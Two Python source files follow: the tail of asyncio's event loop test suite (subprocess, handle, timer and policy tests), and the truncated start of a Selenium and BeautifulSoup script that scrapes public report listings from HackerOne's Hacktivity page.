self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
@unittest.skipUnderUwsgi()
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
@unittest.skipUnderUwsgi()
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
@unittest.skipUnderUwsgi()
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
_, proto = yield self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
async def connect(**kwds):
await self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
async def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
await self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
if hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class SelectEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.SelectSelector())
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
h.cancel()
self.assertTrue(h.cancelled())
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
with self.assertWarns(DeprecationWarning):
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
@unittest.skipUnderCinderJIT("Invalid stack traces (T86183012)")
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
@unittest.skipUnderCinderJIT("Invalid stack traces (T86183012)")
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
h = loop.call_later(0, noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
# collections.abc.Coroutine, but lack cr_core or gi_code attributes
# (such as ones compiled with Cython).
coro = CoroLike()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro.__name__ = coro.__qualname__ = None
self.assertEqual(coroutines._format_coroutine(coro),
'<CoroLike without __name__>() running')
coro = CoroLike()
coro.__qualname__ = 'CoroLike'
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'CoroLike()')
coro = CoroLike()
coro.__qualname__ = 'AAA'
coro.cr_code = None
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_when(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(when, h.when())
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h.cancelled())
# cancel
h.cancel()
self.assertTrue(h.cancelled())
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
@unittest.skipUnderCinderJIT("Invalid stack traces (T86183012)")
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
def test_not_implemented_async(self):
async def inner():
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
with self.assertRaises(NotImplementedError):
await loop.run_in_executor(f, f)
with self.assertRaises(NotImplementedError):
await loop.getaddrinfo('localhost', 8080)
with self.assertRaises(NotImplementedError):
await loop.getnameinfo(('localhost', 8080))
with self.assertRaises(NotImplementedError):
await loop.create_connection(f)
with self.assertRaises(NotImplementedError):
await loop.create_server(f)
with self.assertRaises(NotImplementedError):
await loop.create_datagram_endpoint(f)
with self.assertRaises(NotImplementedError):
await loop.sock_recv(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_recv_into(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_sendall(f, 10)
with self.assertRaises(NotImplementedError):
await loop.sock_connect(f, f)
with self.assertRaises(NotImplementedError):
await loop.sock_accept(f)
with self.assertRaises(NotImplementedError):
await loop.sock_sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.sendfile(f, f)
with self.assertRaises(NotImplementedError):
await loop.connect_read_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.connect_write_pipe(f, mock.sentinel.pipe)
with self.assertRaises(NotImplementedError):
await loop.subprocess_shell(f, mock.sentinel)
with self.assertRaises(NotImplementedError):
await loop.subprocess_exec(f)
loop = asyncio.new_event_loop()
loop.run_until_complete(inner())
loop.close()
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
class GetEventLoopTestsMixin:
_get_running_loop_impl = None
_set_running_loop_impl = None
get_running_loop_impl = None
get_event_loop_impl = None
def setUp(self):
self._get_running_loop_saved = events._get_running_loop
self._set_running_loop_saved = events._set_running_loop
self.get_running_loop_saved = events.get_running_loop
self.get_event_loop_saved = events.get_event_loop
events._get_running_loop = type(self)._get_running_loop_impl
events._set_running_loop = type(self)._set_running_loop_impl
events.get_running_loop = type(self).get_running_loop_impl
events.get_event_loop = type(self).get_event_loop_impl
asyncio._get_running_loop = type(self)._get_running_loop_impl
asyncio._set_running_loop = type(self)._set_running_loop_impl
asyncio.get_running_loop = type(self).get_running_loop_impl
asyncio.get_event_loop = type(self).get_event_loop_impl
super().setUp()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
if sys.platform != 'win32':
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
try:
if sys.platform != 'win32':
asyncio.set_child_watcher(None)
super().tearDown()
finally:
self.loop.close()
asyncio.set_event_loop(None)
events._get_running_loop = self._get_running_loop_saved
events._set_running_loop = self._set_running_loop_saved
events.get_running_loop = self.get_running_loop_saved
events.get_event_loop = self.get_event_loop_saved
asyncio._get_running_loop = self._get_running_loop_saved
asyncio._set_running_loop = self._set_running_loop_saved
asyncio.get_running_loop = self.get_running_loop_saved
asyncio.get_event_loop = self.get_event_loop_saved
if sys.platform != 'win32':
def test_get_event_loop_new_process(self):
# bpo-32126: The multiprocessing module used by
# ProcessPoolExecutor is not functional when the
# multiprocessing.synchronize module cannot be imported.
support.skip_if_broken_multiprocessing_synchronize()
async def main():
pool = concurrent.futures.ProcessPoolExecutor()
result = await self.loop.run_in_executor(
pool, _test_get_event_loop_new_process__sub_proc)
pool.shutdown()
return result
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
def test_get_event_loop_returns_running_loop(self):
class TestError(Exception):
pass
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise TestError
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio.get_running_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
asyncio.set_event_loop(loop)
with self.assertRaises(TestError):
asyncio.get_event_loop()
asyncio.set_event_loop(None)
with self.assertRaises(TestError):
asyncio.get_event_loop()
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
with self.assertRaisesRegex(RuntimeError, 'no running'):
self.assertIs(asyncio.get_running_loop(), None)
self.assertIs(asyncio._get_running_loop(), None)
class TestPyGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._py__get_running_loop
_set_running_loop_impl = events._py__set_running_loop
get_running_loop_impl = events._py_get_running_loop
get_event_loop_impl = events._py_get_event_loop
try:
import _asyncio # NoQA
except ImportError:
pass
else:
class TestCGetEventLoop(GetEventLoopTestsMixin, unittest.TestCase):
_get_running_loop_impl = events._c__get_running_loop
_set_running_loop_impl = events._c__set_running_loop
get_running_loop_impl = events._c_get_running_loop
get_event_loop_impl = events._c_get_event_loop
class TestServer(unittest.TestCase):
def test_get_loop(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
proto = MyProto(loop)
server = loop.run_until_complete(loop.create_server(lambda: proto, '0.0.0.0', 0))
self.assertEqual(server.get_loop(), loop)
server.close()
loop.run_until_complete(server.wait_closed())
class TestAbstractServer(unittest.TestCase):
def test_close(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().close()
def test_wait_closed(self):
loop = asyncio.new_event_loop()
self.addCleanup(loop.close)
with self.assertRaises(NotImplementedError):
loop.run_until_complete(events.AbstractServer().wait_closed())
def test_get_loop(self):
with self.assertRaises(NotImplementedError):
events.AbstractServer().get_loop()
if __name__ == '__main__':
unittest.main()
|
scrapper.py
|
import sys
import requests
import time
import threading
import termplotlib as tpl
from collections import defaultdict
from collections import OrderedDict
from bs4 import BeautifulSoup
from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.support.ui import WebDriverWait
## ---------------- LOGO ---------------- ##
print(r"""
_ _
| | | |
| |__ __ _ ___| | _____ _ __ ___ _ __ ___ ___ ___ _ __ __ _ _ __ ___ _ __
| '_ \ / _` |/ __| |/ / _ \ '__/ _ \| '_ \ / _ \ / __|/ __| '__/ _` | '_ \ / _ \ '__|
| | | | (_| | (__| < __/ | | (_) | | | | __/ \__ \ (__| | | (_| | |_) | __/ |
|_| |_|\__,_|\___|_|\_\___|_| \___/|_| |_|\___| |___/\___|_| \__,_| .__/ \___|_|
| |
|_|
""")
## ---------------- Funtions ---------------- ##
def loading():
loading_thread = threading.currentThread()
while getattr(loading_thread, "loading_loop", True):
print ("Loading ",end='\r')
time.sleep(1) #do some work here...
print ("Loading. ",end='\r')
time.sleep(1) #do some more work here...
print ("Loading.. ",end='\r')
time.sleep(1) #do even more work...
print ("Loading...",end='\r')
time.sleep(1)
print ("[ * ] Hactivity page scrolling complete.")
def scroll_down(driver):
"""Scrolling the page for pages with infinite scrolling"""
loading_thread = threading.Thread(target=loading)
loading_thread.start()
# Get scroll height.
last_height = driver.execute_script("return document.body.scrollHeight")
while True:
# Scroll down to the bottom.
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
# Wait to load the page.
time.sleep(5)
# Calculate new scroll height and compare with last scroll height.
new_height = driver.execute_script("return document.body.scrollHeight")
if new_height == last_height:
break
last_height = new_height
loading_thread.loading_loop = False
loading_thread.join()
def hackerone_search(query, webdriver, report_directory_dictionary, bug_bounty_names):
search_param = query
options = webdriver.ChromeOptions()
options.add_argument('--ignore-certificate-errors')
options.add_argument('--headless')
options.add_argument("--enable-javascript")
webdriver = webdriver.Chrome(ChromeDriverManager().install(), options=options)
url = "https://hackerone.com/hacktivity?querystring=" + search_param
with webdriver as driver:
# Set timeout time
wait = WebDriverWait(driver, 1)
# retrive url in headless browser
driver.get(url)
print("[ * ] Scrolling the page due to infinite scrolling")
scroll_down(driver)
page_source = driver.page_source
soup = BeautifulSoup(page_source, 'html.parser')
driver.close()
## Find the total number of reports
results = soup.find(class_='vertical-spacing vertical-spacing--large vertical-spacing--top')
job_elems = results.find_all('div',class_='grid__column grid__column--four-fifths')
num_results_text = "" #Tracks the total number of reports for the specific Hacktivity query
for job in job_elems:
lookingfor = job.find('h3', class_='daisy-h3 no-margin')
num_results_text = lookingfor.text
#Number of results - int
num_reports = int("".join(filter(str.isdigit, num_results_text))) #Extracts only the digit and nothing else
if (num_reports != 0):
fades = soup.find_all(class_='fade fade--show')
for fade in fades:
report_title_cards = fade.find(class_='sc-gsTCUz fZiDzA spec-hacktivity-content')
# Retrieving report links and directory and adding them into a dictionary
## ---------------- Retrieving directory ---------------- ##
report_directory_str = fade.find(class_='daisy-link routerlink daisy-link daisy-link--major').text
## ---------------- Retrieving links ---------------- ##
if (report_title_cards.find('a', {'class': 'daisy-link ahref daisy-link hacktivity-item__publicly-disclosed spec-hacktivity-item-title'}) != None):
report_link = report_title_cards.find('a', {'class': 'daisy-link ahref daisy-link hacktivity-item__publicly-disclosed spec-hacktivity-item-title'}).attrs['href']
